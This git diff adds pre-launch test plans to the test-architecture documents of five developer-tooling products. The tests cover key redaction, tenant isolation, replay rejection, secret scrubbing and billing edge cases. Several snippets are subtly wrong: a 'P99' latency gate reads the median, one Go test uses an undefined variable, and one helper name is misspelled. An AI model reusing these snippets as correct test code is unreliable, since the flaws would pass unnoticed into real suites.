diff --git a/products/01-llm-cost-router/test-architecture/test-architecture.md b/products/01-llm-cost-router/test-architecture/test-architecture.md index 37b9b05..dd7d1de 100644 --- a/products/01-llm-cost-router/test-architecture/test-architecture.md +++ b/products/01-llm-cost-router/test-architecture/test-architecture.md @@ -2551,3 +2551,167 @@ async fn panic_mode_allowed_for_owner_role() { ``` *End of P1 Review Remediation Addendum* + +--- + +## 12. BMad Review Implementation (Must-Have Before Launch) + +### 12.1 API Key Redaction in Panic Traces + +```rust +// tests/security/key_redaction_test.rs + +#[test] +fn panic_handler_redacts_bearer_tokens_from_stack_trace() { + // Simulate a panic inside the proxy handler while processing a request + // with Authorization: Bearer sk-live-abc123 + let result = std::panic::catch_unwind(|| { + process_request_with_panic("Bearer sk-live-abc123"); + }); + assert!(result.is_err()); + + // Capture the panic message + let panic_msg = get_last_panic_message(); + assert!(!panic_msg.contains("sk-live-abc123"), + "Panic trace contains raw API key!"); + assert!(panic_msg.contains("[REDACTED]") || !panic_msg.contains("sk-")); +} + +#[test] +fn error_log_redacts_provider_api_keys() { + // Simulate an upstream error that includes the provider key in the response + let error_body = r#"{"error": "Invalid API key: sk-proj-abc123xyz"}"#; + let sanitized = redact_sensitive_fields(error_body); + assert!(!sanitized.contains("sk-proj-abc123xyz")); +} + +#[test] +fn telemetry_event_never_contains_raw_api_key() { + let event = create_telemetry_event("Bearer sk-live-secret", "gpt-4o", 100, 50); + let serialized = serde_json::to_string(&event).unwrap(); + assert!(!serialized.contains("sk-live-secret")); + assert!(!serialized.contains("Bearer")); +} +``` + +### 12.2 SSE Billing Leak Prevention (Expanded) + +```rust +#[tokio::test] +async fn sse_disconnect_bills_only_streamed_tokens() { + let stack = E2EStack::start().await; + let mock = stack.mock_provider(); + + // Provider will stream 100 tokens at 1/sec + mock.configure_slow_stream(100, Duration::from_millis(100)); + + // Client reads 10 tokens then disconnects + let mut stream = stack.proxy_stream(&chat_request_streaming()).await; + let mut received = 0; + while let Some(chunk) = stream.next().await { + received += count_tokens_in_chunk(&chunk); + if received >= 10 { break; } + } + drop(stream); + + tokio::time::sleep(Duration::from_millis(500)).await; + + // Billing must reflect only streamed tokens + let usage = stack.get_last_usage_record().await; + assert!(usage.completion_tokens <= 15, // small buffer for in-flight + "Billed {} tokens but only streamed ~10", usage.completion_tokens); + + // Provider connection must be aborted + assert_eq!(mock.active_connections(), 0); +} + +#[tokio::test] +async fn sse_disconnect_during_prompt_processing_bills_zero_completion() { + // Client disconnects before any completion tokens are generated + // (provider is still processing the prompt) + let stack = E2EStack::start().await; + let mock = stack.mock_provider(); + mock.configure_delay_before_first_token(Duration::from_secs(5)); + + let stream = stack.proxy_stream(&chat_request_streaming()).await; + tokio::time::sleep(Duration::from_millis(100)).await; + drop(stream); // Disconnect before first token + + let usage = stack.get_last_usage_record().await; + assert_eq!(usage.completion_tokens, 0); + // Prompt tokens may still be billed (provider processed them) +} +``` + +### 12.3 Token Calculation Edge Cases + +```rust +#[test] +fn tokenizer_handles_unicode_emoji_correctly() { + // cl100k_base tokenizes emoji differently than ASCII + let text = "Hello 🌍πŸ”₯ world"; + let tokens = count_tokens_cl100k(text); + assert!(tokens > 3); // Emoji take multiple tokens +} + +#[test] +fn tokenizer_handles_cjk_characters() { + let text = "δ½ ε₯½δΈ–η•Œ"; + let tokens = count_tokens_cl100k(text); + assert!(tokens >= 4); // Each CJK char is typically 1+ tokens +} + +#[test] +fn cost_calculation_matches_provider_billing() { + // Property test: our token count * rate must match what the provider reports + // within a 1% tolerance (tokenizer version differences) + fc::assert(fc::property( + fc::string_of(fc::any::(), 1..1000), + |text| { + let our_count = count_tokens_cl100k(&text); + let provider_count = mock_provider_token_count(&text); + let diff = (our_count as f64 - provider_count as f64).abs(); + diff / provider_count as f64 <= 0.01 + } + )); +} + +#[test] +fn anthropic_tokenizer_differs_from_openai() { + // Same text, different token counts β€” billing must use the correct tokenizer + let text = "The quick brown fox jumps over the lazy dog"; + let openai_tokens = count_tokens_cl100k(text); + let anthropic_tokens = count_tokens_claude(text); + // They WILL differ β€” verify we use the right one per provider + assert_ne!(openai_tokens, anthropic_tokens); +} +``` + +### 12.4 Dedicated CI Runner for Latency Benchmarks + +```yaml +# .github/workflows/benchmark.yml +# Runs on self-hosted runner (Brian's NAS) β€” not shared GitHub Actions +name: Latency Benchmark +on: + push: + branches: [main] + paths: ['src/proxy/**'] + +jobs: + benchmark: + runs-on: self-hosted # Brian's NAS with consistent CPU + steps: + - uses: actions/checkout@v4 + - name: Run proxy latency benchmark + run: cargo bench --bench proxy_latency + - name: Assert P99 < 5ms + run: | + P99=$(cat target/criterion/proxy_overhead/new/estimates.json | jq '.median.point_estimate') + if (( $(echo "$P99 > 5000000" | bc -l) )); then + echo "P99 latency ${P99}ns exceeds 5ms budget" + exit 1 + fi +``` + +*End of P1 BMad Implementation* diff --git a/products/02-iac-drift-detection/test-architecture/test-architecture.md b/products/02-iac-drift-detection/test-architecture/test-architecture.md index 113245d..4c44472 100644 --- a/products/02-iac-drift-detection/test-architecture/test-architecture.md +++ b/products/02-iac-drift-detection/test-architecture/test-architecture.md @@ -2094,3 +2094,208 @@ Per review recommendation, cap E2E at 10 critical paths. Remaining 40 tests push | E2E/Smoke | 10% (~50) | 7% (~35) | Capped at 10 true E2E + 25 Playwright UI tests | *End of P2 Review Remediation Addendum* + +--- + +## 12. BMad Review Implementation (Must-Have Before Launch) + +### 12.1 mTLS Revocation β€” Instant Lockout + +```go +// tests/integration/mtls_revocation_test.go + +func TestRevokedCert_ExistingConnectionDropped(t *testing.T) { + // 1. Agent connects with valid cert + agent := connectAgentWithCert(t, validCert) + assert.True(t, agent.IsConnected()) + + // 2. Revoke the cert via CRL update + revokeCert(t, validCert.SerialNumber) + + // 3. Force CRL refresh on SaaS (< 30 seconds) + triggerCRLRefresh(t) + + // 4. Existing connection must be terminated + time.Sleep(5 * time.Second) + assert.False(t, agent.IsConnected(), + "Revoked agent still has active mTLS connection β€” cached session not cleared") +} + +func TestRevokedCert_NewConnectionRejected(t *testing.T) { + revokeCert(t, validCert.SerialNumber) + triggerCRLRefresh(t) + + _, err := connectAgentWithCert(t, validCert) + assert.Error(t, err) + assert.Contains(t, err.Error(), "certificate revoked") +} + +func TestPayloadReplay_RejectedByNonce(t *testing.T) { + // Capture a legitimate drift report + report := captureValidDriftReport(t) + + // Replay it + resp := postDriftReport(t, report) + assert.Equal(t, 409, resp.StatusCode) // Conflict β€” nonce already used +} +``` + +### 12.2 Terraform State Lock Recovery on Panic + +```go +// tests/integration/remediation_panic_test.go + +func TestPanicMode_ReleasesTerraformStateLock(t *testing.T) { + // 1. Start a remediation (terraform apply) + execID := startRemediation(t, "stack-1", "drift-1") + waitForState(t, execID, "applying") + + // 2. Verify state lock is held + lockInfo := getTerraformStateLock(t, "stack-1") + assert.NotNil(t, lockInfo, "State lock should be held during apply") + + // 3. Trigger panic mode + triggerPanicMode(t) + + // 4. Wait for agent to abort + waitForState(t, execID, "aborted") + + // 5. State lock MUST be released + lockInfo = getTerraformStateLock(t, "stack-1") + assert.Nil(t, lockInfo, + "Terraform state lock not released after panic β€” infrastructure is now in zombie state") +} + +func TestPanicMode_AgentRunsTerraformForceUnlock(t *testing.T) { + // If normal unlock fails, agent must run `terraform force-unlock` + startRemediation(t, "stack-1", "drift-1") + waitForState(t, execID, "applying") + + // Simulate lock that can't be released normally + corruptStateLock(t, "stack-1") + triggerPanicMode(t) + + // Agent should attempt force-unlock + logs := getAgentLogs(t) + assert.Contains(t, logs, "terraform force-unlock") +} +``` + +### 12.3 RLS Connection Pool Leak Test + +```go +// tests/integration/rls_pool_leak_test.go + +func TestPgBouncer_ClearsTenantContext_BetweenRequests(t *testing.T) { + t.Parallel() + + // 1. Request as Tenant A β€” sets SET LOCAL app.tenant_id = 'tenant-a' + respA := apiRequest(t, tenantAToken, "GET", "/v1/stacks") + assert.Equal(t, 200, respA.StatusCode) + stacksA := parseStacks(respA) + + // 2. Immediately request as Tenant B on same PgBouncer connection + respB := apiRequest(t, tenantBToken, "GET", "/v1/stacks") + assert.Equal(t, 200, respB.StatusCode) + stacksB := parseStacks(respB) + + // 3. Tenant B must NOT see Tenant A's stacks + for _, stack := range stacksB { + assert.NotEqual(t, "tenant-a", stack.TenantID, + "CRITICAL: Tenant B received Tenant A's data β€” PgBouncer leaked context") + } +} + +func TestRLS_100ConcurrentTenants_NoLeakage(t *testing.T) { + // Stress test: 100 concurrent requests from different tenants + var wg sync.WaitGroup + violations := make(chan string, 100) + + for i := 0; i < 100; i++ { + wg.Add(1) + go func(tenantID string) { + defer wg.Done() + token := createTenantToken(t, tenantID) + resp := apiRequest(t, token, "GET", "/v1/stacks") + stacks := parseStacks(resp) + for _, s := range stacks { + if s.TenantID != tenantID { + violations <- fmt.Sprintf("Tenant %s saw data from %s", tenantID, s.TenantID) + } + } + }(fmt.Sprintf("tenant-%d", i)) + } + wg.Wait() + close(violations) + + for v := range violations { + t.Fatal("CROSS-TENANT LEAK:", v) + } +} +``` + +### 12.4 Secret Scrubber Entropy Scanning + +```go +// pkg/agent/scrubber/entropy_test.go + +func TestEntropyScan_DetectsBase64EncodedAWSKey(t *testing.T) { + // AWS key base64-encoded inside a JSON block + input := `{"config": "` + base64.StdEncoding.EncodeToString([]byte("AKIAIOSFODNN7EXAMPLE")) + `"}` + result := scrubber.Scrub(input) + assert.NotContains(t, result, "AKIAIOSFODNN7EXAMPLE") +} + +func TestEntropyScan_DetectsMultiLineRSAKey(t *testing.T) { + input := `-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEA0Z3VS5JJcds3xfn/ygWyF8PbnGy5AhJPnUfGqlTlGa... +-----END RSA PRIVATE KEY-----` + result := scrubber.Scrub(input) + assert.Contains(t, result, "[REDACTED RSA KEY]") +} + +func TestEntropyScan_DetectsHighEntropyCustomToken(t *testing.T) { + // 40-char hex string that looks like a custom API token + token := "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0" + input := fmt.Sprintf(`{"api_token": "%s"}`, token) + result := scrubber.Scrub(input) + // Shannon entropy > 3.5 bits/char should trigger redaction + assert.NotContains(t, result, token) +} + +func TestEntropyScan_DoesNotRedactNormalText(t *testing.T) { + input := `{"message": "Hello world, this is a normal log message"}` + result := scrubber.Scrub(input) + assert.Equal(t, input, result) // No false positives +} +``` + +### 12.5 pgmq Visibility Timeout for Long Scans + +```go +// tests/integration/pgmq_visibility_test.go + +func TestPgmq_LongScan_DoesNotTriggerDuplicateProcessing(t *testing.T) { + // Simulate a scan that takes 5 minutes + queue := setupPgmqQueue(t) + + // Enqueue a drift report + queue.Send(t, makeDriftReport("stack-1")) + + // Consumer 1 picks it up with 2-minute visibility timeout + msg := queue.Read(t, 120) // 120s visibility + assert.NotNil(t, msg) + + // Simulate long processing (extend visibility) + for i := 0; i < 3; i++ { + time.Sleep(90 * time.Second) + queue.ExtendVisibility(t, msg.ID, 120) // Extend by another 2 min + } + + // Consumer 2 should NOT get the same message + msg2 := queue.Read(t, 120) + assert.Nil(t, msg2, "pgmq handed job to second worker while first was still processing") +} +``` + +*End of P2 BMad Implementation* diff --git a/products/03-alert-intelligence/test-architecture/test-architecture.md b/products/03-alert-intelligence/test-architecture/test-architecture.md index 4949f86..afadd6f 100644 --- a/products/03-alert-intelligence/test-architecture/test-architecture.md +++ b/products/03-alert-intelligence/test-architecture/test-architecture.md @@ -1865,3 +1865,227 @@ describe('Slack Notification Circuit Breaker', () => { | E2E | 10% (~20) | 10% (~28) | Dashboard UI (Playwright), onboarding flow | *End of P3 Review Remediation Addendum* + +--- + +## 12. BMad Review Implementation (Must-Have Before Launch) + +### 12.1 HMAC Timestamp Freshness (Replay Attack Prevention) + +```typescript +describe('HMAC Replay Attack Prevention', () => { + it('rejects Datadog webhook with timestamp older than 5 minutes', async () => { + const payload = makeDatadogPayload(); + const staleTimestamp = Math.floor(Date.now() / 1000) - 301; // 5min + 1s + const sig = computeDatadogHMAC(payload, staleTimestamp); + + const resp = await ingest(payload, { + 'dd-webhook-timestamp': staleTimestamp.toString(), + 'dd-webhook-signature': sig, + }); + expect(resp.status).toBe(401); + expect(resp.body.error).toContain('stale timestamp'); + }); + + it('rejects PagerDuty webhook with missing timestamp', async () => { + const payload = makePagerDutyPayload(); + const sig = computePagerDutyHMAC(payload); + + const resp = await ingest(payload, { + 'x-pagerduty-signature': sig, + // No timestamp header + }); + expect(resp.status).toBe(401); + }); + + it('rejects OpsGenie webhook replayed after 5 minutes', async () => { + // OpsGenie doesn't always package timestamp cleanly + // Must extract from payload body and validate + const payload = makeOpsGeniePayload({ timestamp: fiveMinutesAgo() }); + const sig = computeOpsGenieHMAC(payload); + + const resp = await ingest(payload, { 'x-opsgenie-signature': sig }); + expect(resp.status).toBe(401); + }); + + it('accepts fresh webhook within 5-minute window', async () => { + const payload = makeDatadogPayload(); + const freshTimestamp = Math.floor(Date.now() / 1000); + const sig = computeDatadogHMAC(payload, freshTimestamp); + + const resp = await ingest(payload, { + 'dd-webhook-timestamp': freshTimestamp.toString(), + 'dd-webhook-signature': sig, + }); + expect(resp.status).toBe(200); + }); +}); +``` + +### 12.2 Cross-Tenant Negative Isolation Tests + +```typescript +describe('DynamoDB Tenant Isolation (Negative Tests)', () => { + it('Tenant A cannot read Tenant B incidents', async () => { + // Seed data for both tenants + await createIncident('tenant-a', { title: 'A incident' }); + await createIncident('tenant-b', { title: 'B incident' }); + + // Query as Tenant A + const results = await dao.listIncidents('tenant-a'); + + // Explicitly assert Tenant B data is absent + const tenantIds = results.map(r => r.tenantId); + expect(tenantIds).not.toContain('tenant-b'); + expect(results.every(r => r.tenantId === 'tenant-a')).toBe(true); + }); + + it('Tenant A cannot read Tenant B analytics', async () => { + await seedAnalytics('tenant-a', { alertCount: 100 }); + await seedAnalytics('tenant-b', { alertCount: 200 }); + + const analytics = await dao.getAnalytics('tenant-a'); + expect(analytics.alertCount).toBe(100); // Not 300 (combined) + }); + + it('API returns 404 (not 403) for cross-tenant incident access', async () => { + const incident = await createIncident('tenant-b', { title: 'secret' }); + + const resp = await api.get(`/v1/incidents/${incident.id}`) + .set('Authorization', `Bearer ${tenantAToken}`); + + // 404 not 403 β€” don't leak existence + expect(resp.status).toBe(404); + }); +}); +``` + +### 12.3 Correlation Window Edge Cases + +```typescript +describe('Out-of-Order Alert Delivery', () => { + it('late alert attaches to existing incident (not duplicate)', async () => { + const clock = new FakeClock(); + const engine = new CorrelationEngine(new InMemoryWindowStore(), clock); + + // Alert 1 arrives at T=0 + const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 0 }); + const incident1 = await engine.process(alert1); + + // Window closes at T=5min, incident shipped + clock.advanceBy(5 * 60 * 1000); + await engine.flushWindows(); + + // Late alert arrives at T=6min with timestamp T=2min (within original window) + const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 2 * 60 * 1000 }); + const result = await engine.process(lateAlert); + + // Must attach to existing incident, not create new one + expect(result.incidentId).toBe(incident1.incidentId); + expect(result.action).toBe('attached_to_existing'); + }); + + it('very late alert (>2x window) creates new incident', async () => { + const clock = new FakeClock(); + const engine = new CorrelationEngine(new InMemoryWindowStore(), clock); + + const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high' }); + const incident1 = await engine.process(alert1); + + // 15 minutes later (3x the 5-min window) + clock.advanceBy(15 * 60 * 1000); + + const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high' }); + const result = await engine.process(lateAlert); + + expect(result.incidentId).not.toBe(incident1.incidentId); + expect(result.action).toBe('new_incident'); + }); +}); +``` + +### 12.4 SQS Claim-Check Round-Trip + +```typescript +describe('SQS 256KB Claim-Check End-to-End', () => { + it('large payload round-trips through S3 pointer', async () => { + const largePayload = makeLargeAlertPayload(300 * 1024); // 300KB + + // Ingestion compresses and stores in S3 + const resp = await ingest(largePayload); + expect(resp.status).toBe(200); + + // SQS message contains S3 pointer + const sqsMsg = await getLastSQSMessage(localstack, 'alert-queue'); + const body = JSON.parse(sqsMsg.Body); + expect(body.s3Pointer).toBeDefined(); + + // Correlation engine fetches from S3 and processes + const incident = await waitForIncidentCreated(5000); + expect(incident).toBeDefined(); + expect(incident.sourceAlertCount).toBeGreaterThan(0); + }); + + it('S3 fetch timeout does not crash correlation engine', async () => { + // Inject S3 latency (10 second delay) + mockS3.setLatency(10000); + + const largePayload = makeLargeAlertPayload(300 * 1024); + await ingest(largePayload); + + // Correlation engine should timeout and send to DLQ + const dlqMsg = await getDLQMessage(localstack, 'alert-dlq', 15000); + expect(dlqMsg).toBeDefined(); + + // Engine is still healthy + const health = await api.get('/health'); + expect(health.status).toBe(200); + }); +}); +``` + +### 12.5 Free Tier Enforcement + +```typescript +describe('Free Tier (10K alerts/month, 7-day retention)', () => { + it('accepts alert at 9,999 count', async () => { + await setAlertCounter('tenant-free', 9999); + const resp = await ingestAsTenat('tenant-free', makeAlert()); + expect(resp.status).toBe(200); + }); + + it('rejects alert at 10,001 with upgrade prompt', async () => { + await setAlertCounter('tenant-free', 10000); + const resp = await ingestAsTenant('tenant-free', makeAlert()); + expect(resp.status).toBe(429); + expect(resp.body.upgrade_url).toContain('stripe'); + }); + + it('counter resets on first of month', async () => { + await setAlertCounter('tenant-free', 10000); + clock.advanceToFirstOfNextMonth(); + await runMonthlyReset(); + + const resp = await ingestAsTenant('tenant-free', makeAlert()); + expect(resp.status).toBe(200); + }); + + it('purges data older than 7 days on free tier', async () => { + await createIncident('tenant-free', { createdAt: eightDaysAgo() }); + await runRetentionPurge(); + + const incidents = await dao.listIncidents('tenant-free'); + expect(incidents).toHaveLength(0); + }); + + it('retains data for 90 days on pro tier', async () => { + await createIncident('tenant-pro', { createdAt: thirtyDaysAgo() }); + await runRetentionPurge(); + + const incidents = await dao.listIncidents('tenant-pro'); + expect(incidents).toHaveLength(1); + }); +}); +``` + +*End of P3 BMad Implementation* diff --git a/products/04-lightweight-idp/test-architecture/test-architecture.md b/products/04-lightweight-idp/test-architecture/test-architecture.md index 9fdbc24..f225d92 100644 --- a/products/04-lightweight-idp/test-architecture/test-architecture.md +++ b/products/04-lightweight-idp/test-architecture/test-architecture.md @@ -1265,3 +1265,225 @@ def test_meilisearch_index_rebuild_does_not_drop_search(): # Verify zero-downtime index swapping during mapping updates pass ``` + +--- + +## 12. BMad Review Implementation (Must-Have Before Launch) + +### 12.1 Discovery Scan Timeout / Partial Failure Recovery + +```python +# tests/integration/test_discovery_resilience.py + +def test_partial_aws_scan_does_not_delete_existing_services(): + """If AWS scanner times out after discovering 500 of 1000 resources, + existing catalog entries must NOT be marked stale or deleted.""" + + # Seed catalog with 1000 services + seed_catalog(count=1000) + + # Simulate scanner timeout after 500 resources + with mock_aws_timeout_after(500): + result = run_aws_discovery_scan() + + assert result.status == "partial_failure" + assert result.discovered == 500 + + # All 1000 services must still exist in catalog + services = catalog_api.list_services() + assert len(services) == 1000 # NOT 500 + + # Partial results should be staged, not committed + staged = catalog_api.list_staged_updates() + assert len(staged) == 500 + +def test_partial_github_scan_does_not_corrupt_ownership(): + """If GitHub scanner hits rate limit mid-scan, existing ownership + mappings must be preserved.""" + + seed_catalog_with_ownership(count=100) + + with mock_github_rate_limit_after(50): + result = run_github_discovery_scan() + + assert result.status == "partial_failure" + + # All 100 ownership mappings intact + services = catalog_api.list_services() + owned = [s for s in services if s.owner is not None] + assert len(owned) == 100 # NOT 50 + +def test_scan_failure_triggers_alert_not_silent_failure(): + result = run_aws_discovery_scan_with_invalid_credentials() + assert result.status == "failed" + + # Must alert the admin + alerts = get_admin_alerts() + assert any("discovery scan failed" in a.message for a in alerts) +``` + +### 12.2 Ownership Conflict Resolution Integration Test + +```python +# tests/integration/test_ownership_conflict.py + +def test_explicit_config_overrides_implicit_tag(): + """Explicit (CODEOWNERS/config) > Implicit (AWS tags) > Heuristic (commits)""" + + # AWS tag says owner is "team-infra" + aws_scanner.discover_service("auth-api", owner_tag="team-infra") + + # GitHub CODEOWNERS says owner is "team-platform" + github_scanner.discover_service("auth-api", codeowners="team-platform") + + # Resolve conflict + service = catalog_api.get_service("auth-api") + assert service.owner == "team-platform" # Explicit wins + assert service.owner_source == "codeowners" + +def test_concurrent_discovery_sources_do_not_race(): + """Two scanners discovering the same service simultaneously + must not create duplicate entries.""" + + import asyncio + + async def run_both(): + await asyncio.gather( + aws_scanner.discover_service_async("billing-api"), + github_scanner.discover_service_async("billing-api"), + ) + + asyncio.run(run_both()) + + services = catalog_api.search("billing-api") + assert len(services) == 1 # No duplicates + +def test_heuristic_ownership_does_not_override_explicit(): + # Explicit owner set via config + catalog_api.set_owner("auth-api", "team-platform", source="config") + + # Heuristic scanner infers different owner from commit history + github_scanner.infer_ownership("auth-api", top_committer="dev@other-team.com") + + service = catalog_api.get_service("auth-api") + assert service.owner == "team-platform" # Explicit preserved +``` + +### 12.3 VCR Cassette Freshness Validation + +```yaml +# .github/workflows/vcr-refresh.yml +# Weekly job to re-record VCR cassettes against real AWS +name: VCR Cassette Freshness +on: + schedule: + - cron: '0 6 * * 1' # Every Monday 6 AM UTC + +jobs: + refresh: + runs-on: self-hosted + steps: + - uses: actions/checkout@v4 + - name: Re-record cassettes + env: + AWS_ACCESS_KEY_ID: ${{ secrets.VCR_AWS_KEY }} + AWS_SECRET_ACCESS_KEY: ${{ secrets.VCR_AWS_SECRET }} + run: | + VCR_RECORD=all pytest tests/integration/scanners/ -v + - name: Diff cassettes + run: | + git diff --stat tests/cassettes/ + CHANGED=$(git diff --name-only tests/cassettes/ | wc -l) + if [ "$CHANGED" -gt 0 ]; then + echo "⚠️ $CHANGED cassettes changed β€” AWS API responses have drifted" + echo "Review and commit updated cassettes" + fi + - name: Create PR if cassettes changed + uses: peter-evans/create-pull-request@v6 + with: + title: "chore: refresh VCR cassettes (AWS API drift)" + branch: vcr-refresh +``` + +### 12.4 Meilisearch Zero-Downtime Index Rebuild + +```python +# tests/integration/test_meilisearch_rebuild.py + +def test_search_returns_results_during_index_rebuild(): + """Cmd+K search must work during index rebuild (zero downtime).""" + + # Seed index with 100 services + meili.index("services").add_documents(make_services(100)) + meili.index("services").wait_for_pending_update() + + # Start rebuild (creates services_v2, swaps when ready) + rebuild_task = start_index_rebuild() + + # Search must still work during rebuild + results = meili.index("services").search("auth") + assert len(results["hits"]) > 0 + + # Wait for rebuild to complete + rebuild_task.wait() + + # Search still works after swap + results = meili.index("services").search("auth") + assert len(results["hits"]) > 0 + +def test_index_rebuild_failure_does_not_corrupt_active_index(): + meili.index("services").add_documents(make_services(50)) + + # Simulate rebuild failure (e.g., OOM during indexing) + with mock_meili_oom_during_rebuild(): + result = start_index_rebuild() + + assert result.status == "failed" + + # Active index must be untouched + results = meili.index("services").search("billing") + assert len(results["hits"]) > 0 # Still works +``` + +### 12.5 Cmd+K Search Latency from Redis Cache + +```python +# tests/performance/test_search_latency.py + +def test_cmd_k_search_under_10ms_from_redis(): + """Prefix cache hit must return in <10ms.""" + + # Warm the cache + redis_client.set("search:prefix:auth", json.dumps([ + {"name": "auth-service", "owner": "team-platform"}, + {"name": "auth-proxy", "owner": "team-infra"}, + ])) + + import time + start = time.perf_counter_ns() + results = search_api.prefix_search("auth") + elapsed_ms = (time.perf_counter_ns() - start) / 1_000_000 + + assert elapsed_ms < 10, f"Cmd+K search took {elapsed_ms:.1f}ms β€” exceeds 10ms SLA" + assert len(results) == 2 +``` + +### 12.6 Free Tier Enforcement (50 Services) + +```python +def test_free_tier_allows_50_services(): + tenant = create_tenant(tier="free") + for i in range(50): + resp = catalog_api.create_service(tenant, f"service-{i}") + assert resp.status_code == 201 + +def test_free_tier_rejects_51st_service(): + tenant = create_tenant(tier="free") + seed_services(tenant, count=50) + + resp = catalog_api.create_service(tenant, "service-51") + assert resp.status_code == 403 + assert "upgrade" in resp.json()["error"].lower() +``` + +*End of P4 BMad Implementation* diff --git a/products/05-aws-cost-anomaly/test-architecture/test-architecture.md b/products/05-aws-cost-anomaly/test-architecture/test-architecture.md index c379f1c..eef4d38 100644 --- a/products/05-aws-cost-anomaly/test-architecture/test-architecture.md +++ b/products/05-aws-cost-anomaly/test-architecture/test-architecture.md @@ -710,3 +710,198 @@ export const makeBaseline = (overrides) => ({ - CDK definitions, LocalStack event injection, wire everything together. *End of dd0c/cost Test Architecture (v2)* + +--- + +## 12. BMad Review Implementation (Must-Have Before Launch) + +### 12.1 Concurrent Baseline Update Conflict Test + +```typescript +describe('Concurrent Baseline Updates (DynamoDB TransactWriteItem)', () => { + it('two simultaneous Lambda invocations converge to correct baseline', async () => { + // Seed baseline: mean=1.00, stddev=0.10, count=20 + await seedBaseline('tenant-1', 'ec2/m5.xlarge', { mean: 1.00, stddev: 0.10, count: 20 }); + + // Two events arrive simultaneously for the same resource type + const event1 = makeCostEvent({ hourlyCost: 1.50 }); + const event2 = makeCostEvent({ hourlyCost: 2.00 }); + + // Process concurrently + const [result1, result2] = await Promise.allSettled([ + processEvent('tenant-1', 'ec2/m5.xlarge', event1), + processEvent('tenant-1', 'ec2/m5.xlarge', event2), + ]); + + // One succeeds, one retries via ConditionalCheckFailed + const successes = [result1, result2].filter(r => r.status === 'fulfilled'); + expect(successes.length).toBe(2); // Both eventually succeed + + // Final baseline must reflect BOTH events + const baseline = await getBaseline('tenant-1', 'ec2/m5.xlarge'); + expect(baseline.count).toBe(22); // 20 + 2 + // Mean should be updated by both observations (order doesn't matter for Welford) + }); + + it('ConditionalCheckFailed triggers retry with fresh baseline read', async () => { + const spy = vi.spyOn(dynamoClient, 'transactWriteItems'); + + // Force a conflict on first attempt + mockConflictOnce(); + + await processEvent('tenant-1', 'ec2/m5.xlarge', makeCostEvent({ hourlyCost: 3.00 })); + + // Should have been called twice (initial + retry) + expect(spy).toHaveBeenCalledTimes(2); + }); +}); +``` + +### 12.2 Remediation RBAC + +```typescript +describe('Remediation Authorization', () => { + it('only account owners can click Stop Instance', async () => { + const ownerAction = makeSlackAction('stop_instance', { userId: 'U_OWNER' }); + const resp = await handleSlackAction(ownerAction); + expect(resp.status).toBe(200); + }); + + it('viewer role cannot trigger remediation', async () => { + const viewerAction = makeSlackAction('stop_instance', { userId: 'U_VIEWER' }); + const resp = await handleSlackAction(viewerAction); + expect(resp.status).toBe(403); + expect(resp.body.error).toContain('insufficient permissions'); + }); + + it('user from different Slack workspace cannot trigger remediation', async () => { + const foreignAction = makeSlackAction('stop_instance', { + userId: 'U_FOREIGN', + teamId: 'T_OTHER_WORKSPACE' + }); + const resp = await handleSlackAction(foreignAction); + expect(resp.status).toBe(403); + }); + + it('snooze and mark-expected are allowed for all authenticated users', async () => { + const viewerSnooze = makeSlackAction('snooze_24h', { userId: 'U_VIEWER' }); + const resp = await handleSlackAction(viewerSnooze); + expect(resp.status).toBe(200); + }); +}); +``` + +### 12.3 Clock Interface for Governance Tests + +```typescript +// src/governance/clock.ts +interface Clock { + now(): number; + advanceBy(ms: number): void; +} + +class FakeClock implements Clock { + private current: number; + constructor(start = Date.now()) { this.current = start; } + now() { return this.current; } + advanceBy(ms: number) { this.current += ms; } +} + +describe('14-Day Auto-Promotion (Clock-Injected)', () => { + let clock: FakeClock; + let governance: GovernanceEngine; + + beforeEach(() => { + clock = new FakeClock(new Date('2026-03-01').getTime()); + governance = new GovernanceEngine(clock); + }); + + it('does not promote at day 13', () => { + clock.advanceBy(13 * 24 * 60 * 60 * 1000); + const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 }); + expect(result.promoted).toBe(false); + }); + + it('promotes at day 15 with low FP rate', () => { + clock.advanceBy(15 * 24 * 60 * 60 * 1000); + const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 }); + expect(result.promoted).toBe(true); + expect(result.newMode).toBe('audit'); + }); + + it('does not promote at day 15 with high FP rate', () => { + clock.advanceBy(15 * 24 * 60 * 60 * 1000); + const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.15 }); + expect(result.promoted).toBe(false); + expect(result.reason).toContain('false-positive rate'); + }); +}); +``` + +### 12.4 Property-Based Tests with 10K Runs + +```typescript +describe('Anomaly Scorer (fast-check, 10K runs)', () => { + it('score is always between 0 and 100', () => { + fc.assert( + fc.property( + fc.record({ + cost: fc.float({ min: 0, max: 10000, noNaN: true }), + mean: fc.float({ min: 0, max: 10000, noNaN: true }), + stddev: fc.float({ min: 0, max: 1000, noNaN: true }), + }), + (input) => { + const score = scorer.score(input); + return score >= 0 && score <= 100; + } + ), + { numRuns: 10000, seed: 42 } // Reproducible + ); + }); + + it('score monotonically increases as cost increases', () => { + fc.assert( + fc.property( + fc.float({ min: 0, max: 100, noNaN: true }), + fc.float({ min: 0, max: 100, noNaN: true }), + fc.float({ min: 0.01, max: 50, noNaN: true }), + (costA, costB, stddev) => { + const baseline = { mean: 5.0, stddev }; + const scoreA = scorer.score({ cost: Math.min(costA, costB), ...baseline }); + const scoreB = scorer.score({ cost: Math.max(costA, costB), ...baseline }); + return scoreB >= scoreA; + } + ), + { numRuns: 10000, seed: 42 } + ); + }); +}); +``` + +### 12.5 Redis Failure During Panic Mode Check + +```typescript +describe('Panic Mode Redis Failure', () => { + it('defaults to panic=active (safe) when Redis is unreachable', async () => { + // Kill Redis connection + await redis.disconnect(); + + const isPanic = await governance.checkPanicMode('tenant-1'); + // MUST default to safe (panic active) β€” not dangerous (panic inactive) + expect(isPanic).toBe(true); + }); + + it('logs warning when Redis is unreachable for panic check', async () => { + await redis.disconnect(); + const logSpy = vi.spyOn(logger, 'warn'); + + await governance.checkPanicMode('tenant-1'); + + expect(logSpy).toHaveBeenCalledWith( + expect.stringContaining('Redis unreachable β€” defaulting to panic=active') + ); + }); +}); +``` + +*End of P5 BMad 